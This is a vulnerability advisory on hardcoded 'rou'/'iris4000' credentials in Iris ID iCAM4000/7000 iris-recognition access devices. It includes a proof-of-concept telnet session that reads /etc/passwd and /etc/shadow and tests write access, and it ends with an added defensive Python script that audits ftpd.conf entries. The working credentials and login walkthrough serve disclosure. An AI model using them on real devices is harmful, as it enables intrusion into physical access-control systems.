Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access


Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
                  https://www.irisid.com/productssolutions/irisaccesssystem/irisaccess4000/
                  http://www.irisid.com/productssolutions/hardwareproducts/icam4000series/
                  https://www.irisid.com/productssolutions/irisaccesssystem/irisaccess7000/
                  https://www.irisid.com/productssolutions/hardwareproducts/icam7-series/

Affected version: iCAM4000:
                    iCAM Software: 3.09.02
                    iCAM File system: 1.3
                    CMR Firmware: 5.5 and 3.8
                    EIF Firmware: 9.5 and 8.0
                    HID iClass Library: 2.01.05
                    ImageData Library: 1.153
                    Command Process: 1.02

                  iCAM7000:
                    iCAM Software: 8.01.07
                    iCAM File system: 1.4.0
                    EIF Firmware: 1.9
                    HID iClass Library: 1.00.00
                    ImageData Library: 01.01.32
                    EyeSeek Library: 5.00
                    Countermeasure Library: 3.00
                    LensFinder Library: 5.00
                    Tilt Assist Library: 4.00

Summary: The 4th generation IrisAccess™ 7000 series iris recognition solution
offered by Iris ID provides fast, secure, and highly accurate, non-contact
identification by the iris of the eye. The iCAM7000's versatility and
flexibility allow for easy integration with many Wiegand and network based
access control, time and attendance, visitor management and point of sale
applications. The iCAM4000 or 4010 with embedded smart card is the best-selling
model in the IrisAccess 4000 range. With simultaneous two-eye capture, a
face-badging camera and motorized height adjustment, the iCAM4000 is easily
configured for use in a kiosk as well as in applications where a traditional
wall-mount is used.

Desc: The Iris ID IrisAccess iCAM4000/7000 series suffers from use of hard-coded
credentials. When the device interface is visited with a browser on port 80, the
application loads an applet JAR file 'ICAMClient.jar' into the user's browser
which serves additional admin features. In the JAR file there is an account
'rou' with password 'iris4000' that has read and limited write privileges on
the affected node. An attacker can access the device with these credentials by
starting a simple telnet session on port 23, gaining access to sensitive
information, and/or via FTP on port 21 (with EVERYTHING allowed), uploading
malicious content.
=====================================================================================

/html/ICAMClient.jar (ICAMClient.java):
---------------------------------------

97:  param_host = getParameter("host");
98:  param_user = "rou";//getParameter("user");
99:  param_pass = "iris4000";//getParameter("pass"); // password
100: param_path = getParameter("path"); // path on the server


/etc/ftpd/ftpd.conf:
--------------------

69:  # User list:
70:  # Format:user=<login> <passwd> <subdir> <maxlogins> <flags>
71:  #   <login>     user name
72:  #   <passwd>    password or * for anonymous access
73:  #   <subdir>    (internally appended to serverroot)
74:  #               the user has access to the WHOLE SUBTREE,
75:  #               if the server has access to it
76:  #   <maxlogins> maximal logins with this usertype
77:  #   <flags>     D - download
78:  #               U - upload + making directories
79:  #               O - overwrite existing files
80:  #               M - allows multiple logins
81:  #               E - allows erase operations
82:  #               A - allows EVERYTHING(!)
101:
103: user=rou iris4000 / 5 A

=====================================================================================


Tested on: GNU/Linux 2.4.19 (armv5tel)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5347
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php


06.05.2016

--


telnet [IP]
iCAM4000 login: rou
Password:
[rou@iCAM4000 rou]# id
uid=500(rou) gid=500(rou) groups=500(rou)
[rou@iCAM4000 rou]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
rou:x:500:500::/home/rou:/bin/bash
[rou@iCAM4000 rou]# cd /web
[rou@iCAM4000 /web]# ls -al
total 0
drwxrwxr-x    1 rou      rou             0 Jul 26 07:22 .
drwxr-xr-x    1 root     root            0 Jan  1  1970 ..
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 cgi-bin
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 html
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 images
[rou@iCAM4000 /web]# cat /etc/shadow
root:{{REMOVED}}
bin:*:10897:0:99999:7:::
daemon:*:10897:0:99999:7:::
adm:*:10897:0:99999:7:::
lp:*:10897:0:99999:7:::
sync:*:10897:0:99999:7:::
shutdown:*:10897:0:99999:7:::
halt:*:10897:0:99999:7:::
mail:*:10897:0:99999:7:::
news:*:10897:0:99999:7:::
uucp:*:10897:0:99999:7:::
operator:*:10897:0:99999:7:::
games:*:10897:0:99999:7:::
gopher:*:10897:0:99999:7:::
ftp:*:10897:0:99999:7:::
nobody:*:10897:0:99999:7:::
rou:$1$LfhrWa0e$Crfm4qz7MFEaWaA77NFci0:12702:0:99999:7:::
[rou@iCAM4000 /web]# cat /etc/issue
Iris@ID iCAM4000 Linux (experimental)
Kernel 2.4.19-rmk7-pxa1 on an armv5tel
[rou@iCAM4000 /web]# ls -al html/
total 289
drwxrwxr-x    1 rou      rou             0 Jan 31  2013 .
drwxrwxr-x    1 rou      rou             0 Jul 26 07:22 ..
-rw-rw-r--    1 rou      rou          4035 Jan 31  2013 DHCPSettings_reboot.htm
-rw-rw-r--    1 rou      rou        100614 Jan 10  2008 ICAMClient.jar
-rw-rw-r--    1 rou      rou          6376 Jan 31  2013 WiegandSettings.htm
-rw-rw-r--    1 rou      rou          5643 Jan 31  2013 authentication.htm
-rw-rw-r--    1 rou      rou          6166 Jan 31  2013 changeusername.htm
-rw-rw-r--    1 rou      rou          4816 Jan 31  2013 displayconfigsettings.htm
-rw-rw-r--    1 rou      rou          5643 Jan 31  2013 downloadauthentication.htm
-rw-rw-r--    1 rou      rou          4850 Jan 31  2013 downloadvoice_result.htm
-rw-rw-r--    1 rou      rou          3237 Jan 31  2013 error.htm
-rw-rw-r--    1 rou      rou          3234 Jan 31  2013 error_ip.htm
-rw-rw-r--    1 rou      rou          3248 Jan 31  2013 error_loginfailure.htm
-rw-rw-r--    1 rou      rou          3349 Jan 31  2013 error_usb_ip.htm
-rw-rw-r--    1 rou      rou          6128 Jan 31  2013 ftpupload.htm
-rw-rw-r--    1 rou      rou          5331 Jan 31  2013 iCAMConfig.htm
-rw-rw-r--    1 rou      rou          4890 Jan 31  2013 icamconfig_reboot.htm
-rw-rw-r--    1 rou      rou          5314 Jan 31  2013 index.htm
-rw-rw-r--    1 rou      rou          7290 Jan 31  2013 main.htm
-rw-rw-r--    1 rou      rou          3662 Jan 31  2013 reboot_result.htm
-rw-rw-r--    1 rou      rou          5782 Jan 31  2013 smartcardauthentication.htm
-rw-rw-r--    1 rou      rou         17783 Jan 31  2013 smartcardconfig.htm
-rw-rw-r--    1 rou      rou          4895 Jan 31  2013 smartcardconfig_reboot.htm
-rw-rw-r--    1 rou      rou          5809 Jan 31  2013 smartcardconfig_result.htm
-rw-rw-r--    1 rou      rou          3672 Jan 31  2013 systeminfo.htm
-rw-rw-r--    1 rou      rou          5870 Jan 31  2013 updateicamconfig.htm
-rw-rw-r--    1 rou      rou          4239 Jan 31  2013 updateicamconfig_result.htm
-rw-rw-r--    1 rou      rou          6612 Jan 31  2013 updatenetworksettings.htm
-rw-rw-r--    1 rou      rou          4651 Jan 31  2013 updatenetworksettings_result.htm
-rw-rw-r--    1 rou      rou          5014 Jan 31  2013 updatenetworksettings_state.htm
-rw-rw-r--    1 rou      rou          3985 Jan 31  2013 upload.htm
-rw-rw-r--    1 rou      rou          5645 Jan 31  2013 uploadauthentication.htm
-rw-rw-r--    1 rou      rou          4737 Jan 31  2013 uploadiriscapture_result.htm
-rw-rw-r--    1 rou      rou          6028 Jan 31  2013 voicemessagedownload.htm
-rw-rw-r--    1 rou      rou          6299 Jan 31  2013 voicemessageupdate.htm
-rw-rw-r--    1 rou      rou          5645 Jan 31  2013 wiegandauthentication.htm
-rw-rw-r--    1 rou      rou          4893 Jan 31  2013 wiegandconfig_reboot.htm
[rou@iCAM4000 /web]# echo $SHELL
/bin/bash
[rou@iCAM4000 /web]# echo pwn > test.write
[rou@iCAM4000 /web]# cat test.write
pwn
[rou@iCAM4000 /web]# rm -rf test.write
[rou@iCAM4000 /web]# cd /etc/ftpd
[rou@iCAM4000 ftpd]# pwd
/etc/ftpd
[rou@iCAM4000 ftpd]# cat ftpd.conf |grep user=rou
user=rou iris4000 / 5 A
[rou@iCAM4000 ftpd]# ^D
Connection to host lost.
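As an added audit example (not part of the advisory or the vendor's firmware), the script below parses user= lines in the format the device's own ftpd.conf comments document and flags the entries an auditor would question: the A flag, a subdir of /, and a plaintext password. The sample configuration is constructed; its last line mirrors the entry shown above.

```python
# Added example: audit user= lines of an ftpd.conf written in the format the
# device's config comments document: user=<login> <passwd> <subdir> <maxlogins> <flags>

# Constructed sample config; the last line mirrors the advisory's finding.
SAMPLE_CONF = """\
# User list (comment lines are ignored by the parser)
user=anonymous * /pub 10 D
user=backup secret123 /backup 2 UOE
   user=rou iris4000 / 5 A
"""


def parse_ftpd_conf(text):
    """Return one dict per user= line; comments, blanks and malformed lines are skipped."""
    users = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop trailing comments
        if not line.startswith("user="):
            continue
        parts = line[len("user="):].split()
        if len(parts) < 4 or not parts[3].isdigit():
            continue                             # not enough fields to be an entry
        login, passwd, subdir, maxlogins = parts[:4]
        flags = parts[4] if len(parts) > 4 else ""
        users.append({"login": login, "passwd": passwd, "subdir": subdir,
                      "maxlogins": int(maxlogins), "flags": flags})
    return users


def audit_user(u):
    """Findings an auditor would raise for a single account entry."""
    findings = []
    flags = set(u["flags"])
    if "A" in flags:
        findings.append("flag A allows everything")
    elif {"U", "O", "E"} <= flags:
        findings.append("U+O+E together amount to full write access")
    if u["subdir"] == "/":
        findings.append("subdir / exposes the whole server root")
    if u["passwd"] == "*":
        if flags & {"A", "U", "O", "E"}:
            findings.append("anonymous account with write rights")
    else:
        findings.append("plaintext password in config")
    return findings


def audit_ftpd_conf(text):
    """Map each login to its findings; an empty list means nothing was flagged."""
    return {u["login"]: audit_user(u) for u in parse_ftpd_conf(text)}


if __name__ == "__main__":
    for login, findings in audit_ftpd_conf(SAMPLE_CONF).items():
        print(f"{login}: {'; '.join(findings) or 'ok'}")
```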